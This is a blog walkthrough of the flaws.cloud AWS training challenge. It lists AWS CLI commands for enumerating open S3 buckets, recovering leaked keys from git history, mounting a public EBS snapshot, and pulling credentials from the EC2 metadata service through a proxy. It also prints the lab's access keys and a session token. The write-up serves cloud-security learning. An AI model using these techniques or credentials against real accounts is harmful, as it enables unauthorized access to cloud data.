Flaws.cloud Walkthrough

Posted on

Cloud pentesting using the AWS platform and flaws web series to work through insecure S3 Buckets, Authentication, Metadata Services and accessing EC2 Instances.

Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.

Through a series of levels you’ll learn about common mistakes and gotchas when using Amazon Web Services (AWS). There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues. A series of hints are provided that will teach you how to discover the info you’ll need. If you don’t want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. At the start of each level you’ll learn how to avoid the problem the previous level exhibited. Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.

Level 1 - Enumerate AWS

This level is buckets of fun. See if you can find the first sub-domain. Need a hint?

1
dig flaws.cloud


1
nslookup flaws.cloud


1
nslookup 52.218.236.202

s3 bucket discovered at s3-website-us-west-2.amazonaws.com

S3 Bucket address translation http://flaws.cloud.s3-website-us-west-2.amazonaws.com/

Install AWS CLI

1
2
3
 curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

check for install with version check

1
aws --version

Access S3 Bucket with AWS CLI

1
aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2

file secret-dd02c7c.html looks interesting.

Navigate to secret http://flaws.cloud/secret-dd02c7c.html

Level 2 - Insecure S3 Buckets

Level 2 is at http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Permissions within AWS S3 buckets have a default to private and secure but if buckets have been modified for Grantee as everyone anyone who accesses the URL will

Permission flaw: Everyone https://flaws.cloud.s3.amazonaws.com/

Creating a IAM user on AWS: Within AWS Dashboard search for IAM

Add user under “Users”

create Username and select access key:

attach to group in this case “AdminS3” to which can be created with “Create Group”

add additonal tags if need be for organization

Review and create user:

Important - the Secret Access Key will ONLY be displayed at this point and if lost will need to be regenerated.

Configure aws on linux

1
aws configure

Enter AWS Access Key ID ###…### Enter AWS Secret Access Key ###…### Enter Region: us-east-1 Enter Default Output: json

default text file location with parameters can be found at:

1
2
~/.aws/config
~/.aws/credentials

Access S3 but with account

1
aws s3 --profile default ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Level 3 - S3 Buckets Authenticated AWS Users

The next level is at http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

Similar to permissions to “Everyone” permissions can be set to “Any Authenticaed AWS User” which leaves the S3 bucket exposed as well.

This was an older setting and is no longer available in the webconsole but the SDK and third-party tools sometimes use it.

Find AWS Key

https://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/ Bucket contains an git config file:

Download entire s3 bucket locally

1
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

Inspect git log

1
git log

Note that a comment of accident commit.

checkout git commit

1
git checkout b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526

performing a directory search access_keys.txt is discovered

1
access_key AKIAJ366LIPB4IJKT7SA                                                 secret_access_key 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

Configure new aws profile

1
2
aws configure --profile flaws
aws --profile flaws s3 ls

List of files in s3 bucker are displayed

Level 4 - Creating snapshot - create instance loading snapshot

The next level is at http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud

Note: Always roll keys if you suspect they were compromised..

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

Identify account ID

1
aws --profile flaws sts get-caller-identity

Account id: 975426262029

View ec3 backups

add us-west-2 region to ~/.aws/config

Describe Snapshots

1
aws --profile flaws  ec2 describe-snapshots --owner-id 975426262029

Mount snapshot ID

1
aws --profile default ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89

ensure under AWS IAM that AdministratorAccess permissions is added to user - or failure may occur.

Launch EC2 new instance on us-west-2

Select “Free Tier”

Add Storage of snapshot created: snapshot storage name: snap-0b49342abd1bdcb89 set device: /dev/sdf

SSH to newly created instance

list drives:

1
lsblk

view drive information

1
 sudo file -s /dev/xvdf1

mount drive

1
sudo mount /dev/xvdf1 /mnt

Discover interesting file within the /home/ubuntu a file containing cleartext password is discovered: setupNginx.sh

Login to web service http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/

utilizing discovered credientials and gained access to level 5

Level 5 - 169.254.169.254 Metadata Service

Good work getting in. This level is described at http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

AWS cloud services inclue a metadata service that is housed at 169.254.169.254 and RFC-3927 describes exactly how the services functions.

Accessing Metadata Service of flaws.cloud http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

Listing metadata events for EC2 Instance.

Latest Meta Data - Security Credentials http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/

new set of Access + Secret Keys Identified along with a Token

1
2
3
AccessKeyId : ASIA6GG7PSQGZMKA4S7M,
SecretAccessKey : hltRwRHKDh1mmFcCHE+X9B+5nHJgpgtD2nh/oNbu,
"Token" : "IQoJb3JpZ2luX2VjEHkaCXVzLXdlc3QtMiJGMEQCIBIm6/E56oOLBewA22HCET6/Q1f8rBdBuZyCqIPffTxKAiBmPOmy1tLJnbLKW7HxW7/33tRzH7tup9wFz6Blr/fmkSqDBAiS//////////8BEAIaDDk3NTQyNjI2MjAyOSIMomp1oLapWcBppahAKtcDUoKf6iCahQh6NFfH+ZHxBw0cFElwH0XUlLwl6abbszUslOoCCc2CkkWmYWdlRVpF204Hg76Wp9KufKjpEqcvrbmzrlJgt1AJ6Nh42lT4b8/NAblJ0M/C0PywuoTGPf5QrpaKQ+nlR52jN/FhXbDwIMmdXLfg4Zil2xUEXNlunP9qNK2Il+blNxz+Rt9avRNJJPqjZ8WhDnQeMmdFgQ76bwkQAJjiJIqYX7QIDTeFromeWS+hMvWNf6Bhd5qm3fUCIqlkybJ1Kd8wBjWGvkKviyNgVIx28q1wUKEqCBC3gFl+lVveVX3x/F3e5FIVEi/ZbpaJ4DRN5C2nkNtS4hoiUiy3evU/eZaiDWQyuTAOpR2wBtkljw03cyigL08080dk4Jv7IYNOlJDKwApaAkfbvsYij9Q/1MtsuKw1j7yx4So70XrPTr2rBP1bf482rjv++S+crm9NzYxHP2qRhKWBmPrQcb3PsKcNvMgeOM+uHQvPMVslNtXZGqWlmZ3c6zS2SUcWyCkLyrLz1+v9dyhH7T/mYQPq+sX73LaJpRqhnmzb7mS/9S7m7g2Ue7BTW1C2+ncmEx1zoeK63rQnlB9o9g6D8JChUPckVOnwWXTuYt/g/rjC6AiWMIaCjI8GOqYBPHYSKIy8o6kbLP2hZnfw7s9oEZJMLsiEhOmMHfpt9kQXiRueQAuwMLaXIJaAfmxQcYo3CSFLBhHMKbbdtmZ7YzUl8hPUKTTNB3dGs0rFr3WbcuC+FE4uVc9GhKjw6oBK7WrK7yo8YktrO9iycer0amUcGqBmh4EURJhGCRfjRDdbAQ9osL5z+qHFZeL0kAd4AtSANJM/nslukeYbBSRGzesFVfI3jQ=="

Create Level5 AWS profile with credentials within /.aws/credentials/ and /.aws/config

./aws/credentials:

Access level 6

1
aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Navigate to directory http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Level 6 - IAM Access Keys via EC2 User-data

Takeaway: Do not allow access to 169.254.169.254 by applications.

Access level 6 with keys provided keys to level 6

1
2
Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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

add to /.aws/credentials

Security Group Audiot

1
aws --profile level6 iam get-user

List policies attached to user

1
aws --profile level6 iam list-attached-user-policies --user-name Level6

“list_apigateways” a custom policy created

View IAM policy

1
aws --profile level6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

using ARN to view policy:

1
 aws --profile level6 iam get-policy-version  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

Policy is using “apigateway:GET” on the “arn:aws:apigateway:us-west-2::/restapis/*

Using apigateway to GET - List Lamda Functions

1
aws --region us-west-2 --profile level6 lambda list-functions

Get Policy for Lamda

1
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6

The ability to execute arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6` That “s33ppypa75” is a rest-api-id

1
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"

Stage name is “Prod” which are lamda functions using the rest-api-id, stage name, region and resource: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

The End

http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/

Takeaways: Manage the permissions of everything and neer allow users to read metadata where permissions are.